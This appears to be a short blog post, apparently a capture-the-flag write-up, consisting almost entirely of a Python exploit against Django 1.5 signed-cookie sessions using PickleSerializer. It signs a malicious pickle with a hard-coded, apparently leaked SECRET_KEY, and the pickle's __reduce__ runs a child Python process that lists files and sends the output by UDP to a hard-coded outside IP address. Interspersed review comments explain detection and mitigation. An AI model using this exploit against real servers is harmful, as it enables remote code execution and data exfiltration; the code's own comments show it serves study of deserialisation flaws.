Gift

2019-06-12  本文已影响0人  Yix1a

c62s的生日礼物

# coding: utf-8
# Django-1.5.12
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
from django.conf import settings

# Configure a standalone Django settings object so django.core.signing can be used outside a project.
# NOTE(review): SECRET_KEY is the key django.core.signing uses, so anyone holding it can produce
# values that verify as genuine. The author's comment says the key was "obtained"; the page does not
# show how. For the owner of the application, a disclosed key means rotating it and invalidating
# every session and token that was signed with it.
settings.configure(SECRET_KEY='oa4$kkk802=rfm@tl^e5yb3qvs_ea3r!m*&j+#_+s-9=xcieci') # the SECRET_KEY that was obtained


class GetShellWithPython(object):
    """Proof-of-concept object whose pickled form runs a command when it is unpickled.

    pickle records the pair returned by ``__reduce__`` (a callable and its
    argument tuple) and invokes that callable while loading, so any code path
    that unpickles attacker-supplied bytes executes the call described here.

    Defender view: the effect on the deserialising host is a child ``python -c``
    process and an outbound UDP datagram; a web worker spawning an interpreter
    with an inline script is the observable to alert on. The underlying fix is
    to stop unpickling client-held data, not to filter payloads.
    """

    def __reduce__(self):
        """Return ``(subprocess.call, (argv,))`` for pickle to store."""
        from subprocess import call

        # Inline script for the child interpreter: it reads the output of "ls"
        # and sends it in one UDP datagram (SOCK_DGRAM) to the remote host and
        # port hard-coded in the last statement.
        inline_script = (
            'import socket, os;c=os.popen("ls").read().strip();'
            's=socket.socket(socket.AF_INET, socket.SOCK_DGRAM);'
            's.sendto(c, ("45.63.40.88", 1000));'
        )
        child_argv = ['python', '-c', inline_script]
        # The argument tuple has a single element, the argv list, so the
        # stored call is subprocess.call(child_argv).
        return (call, (child_argv,))


# Pickle a GetShellWithPython instance and sign the result with the configured SECRET_KEY.
# The salt string names Django's signed-cookie session backend, so the output is presumably meant
# to be accepted as a session cookie by that backend.
# NOTE(review): with PickleSerializer, the signature is the only thing standing between a cookie
# and pickle.loads on the server; once the key is known it offers no protection. Mitigation on the
# application side: set SESSION_SERIALIZER to 'django.contrib.sessions.serializers.JSONSerializer'
# (the default from Django 1.6 on), or use a server-side session backend, and rotate SECRET_KEY.
sess = signing.dumps(
    obj=GetShellWithPython(),
    serializer=PickleSerializer,
    salt='django.contrib.sessions.backends.signed_cookies'
)
print sess # sess is something like a sessionid value; once obtained, it is sent out.

